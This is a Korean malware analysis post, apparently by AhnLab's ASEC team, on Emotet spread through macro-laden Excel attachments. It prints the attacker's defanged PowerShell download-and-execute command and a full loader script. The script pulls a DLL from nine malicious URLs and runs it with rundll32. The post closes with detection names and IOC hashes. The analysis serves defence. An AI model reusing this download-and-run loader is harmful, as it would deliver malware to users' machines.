엑셀 파일을 통해 유포 중인 Emotet 악성코드

ASEC 분석팀은 Emotet 악성코드를 다운로드하는 엑셀 문서가 지난달부터 꾸준히 유포되고 있음을 확인하였다. 엑셀 파일 내부에는 아래 그림과 같이 매크로 실행을 유도하는 내용이 포함되어 있다.

그림 1. 악성 엑셀 파일1
그림 2. 악성 엑셀 파일2

엑셀 파일에는 숨겨진 시트에 존재하는 특정 셀에 대해 매크로 이름 상자에 Auto_Open으로 지정되어있어 사용자가 콘텐츠 사용 버튼 클릭 시 해당 셀에 있는 수식이 자동으로 실행된다.

그림 3. 엑셀 파일에 존재하는 숨겨진 시트와 이름 상자

Auto_Open으로 지정된 셀에는 다음과 같이 mshta를 실행하는 명령어가 포함되어있다.

그림 4. 숨김 시트에 존재하는 코드

hxxp://92.255.57[.]195/ru/ru.html 에는 Powershell 명령어를 실행하는 스크립트가 포함되어 있어 mshta 에서 파워쉘을 실행하여 악성 행위를 수행한다.

그림 5. ru.html에 존재하는 스크립트

위 스크립트를 통해 실행되는 파워쉘 명령어는 다음과 같다.

  • powershell -noexit $JI ='(New-Object Net.WebClient).DownloadString(”hxxp://92.255.57[.]195/ru/ru.png”)’; IEX $JI | IEX

위 파워쉘 명령어를 통해 접속하는 hxxp://92.255.57[.]195/ru/ru.png 에는 추가 스크립트가 존재한다. 해당 스크립트에는 Emotet 악성코드를 다운로드하는 다수의 URL이 포함되어 있으며, URL에 차례로 접속하여 악성 DLL 파일을 다운로드 하여 C:\Users\Public\Documents\ssd.dll 로 저장한다. 이후, rundll32.exe를 통해 다운로드한 악성 DLL 파일을 실행한다.

$path = "C:\Users\Public\Documents\ssd.dll";
$url1 = 'hxxp://chicagocloudgroup.com/wp-content/updraft/GBLpmsxC3TJzRT4iX4H/';
$url2 = 'hxxp://mijinogu.com/img/6TIRyK3zmCWqa42lxh/';
$url3 = 'hxxp://vulkanvegasbonus.jeunete.com/wp-content/yQX9yEik3TKo5Gg/';
$url4 = 'hxxps://hammerpzjx.xyz/qatta/VOWHxsTY4TllKdfHIiw/';
$url5 = 'hxxp://comsatnet.com/ComsatNet/Cfga/';
$url6 = 'hxxps://guardagfq.xyz/wp-content/P1ZRZyNP/';
$url7 = 'hxxp://_dc-mx.1b584bc01d04.artichain.finance/doc/LIXRmRqj/';
$url8 = 'hxxp://olgazadonskaya.com/music/SpGFuQkTMwkw0L9yc0/';
$url9 = 'hxxps://a.easeth.work/assets/hBDR/';

$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9".split(",");
foreach ($url in $urls) {
   try {
       $web.DownloadFile($url, $path);
       if ((Get-Item $path).Length -ge 30000) {
           [Diagnostics.Process];
           break;
       }
   }
   catch{}
} 
Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;

다운로드 된 악성 DLL 파일은 Emotet 악성코드로 파일 실행 시 C:\Windows\system32\[랜덤명]\[랜덤명].agc 으로 자가복제 및 DllRegisterServer를 인자로 하여 [랜덤명].agc 파일을 실행한다. 파일 실행 시 내부에 존재하는 다수의 C&C 서버 주소로 접속을 시도하며, 접속에 성공할 시 공격자로부터 명령을 받아 추가 악성코드 다운로드 등의 악성 행위를 수행할 수 있다.

해당 엑셀 파일은 이메일을 통해 유포되기에 발신인을 알 수 없는 메일에 대한 사용자의 주의가 요구된다. 또한, Emotet 악성코드는 과거부터 꾸준히 워드나 엑셀 등 문서 파일을 통해 다운로드 되므로 출처가 불분명한 문서 파일의 매크로 사용을 자제해야한다.

V3에서는 해당 악성코드에 대해 아래와 같이 진단하고 있다

[파일 진단]

  • Downloader/XLS.Generic
  • Malware/Win.Generic.R466206

[IOC 정보]

  • 3e8142e24f51fe068008092a5ba10388
  • 519525d3fa350c5c842cf446258a5af9
  • e2baebf4d9bcbfe4a8ce7df6a52e2baa

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,

0 0 votes
별점 주기
guest
2 댓글
Inline Feedbacks
View all comments
trackback

[…] 악성 엑셀 문서가 활발히 유포되고 있음을 확인하였다. 지난달 ‘엑셀 파일을 통해 유포 중인 Emotet 악성코드’를 통해 해당 유형의 악성코드에 대해 소개하였다. 당시에는 매크로 […]

trackback

[…] 엑셀 파일을 통해 유포 중인 Emotet 악성코드 […]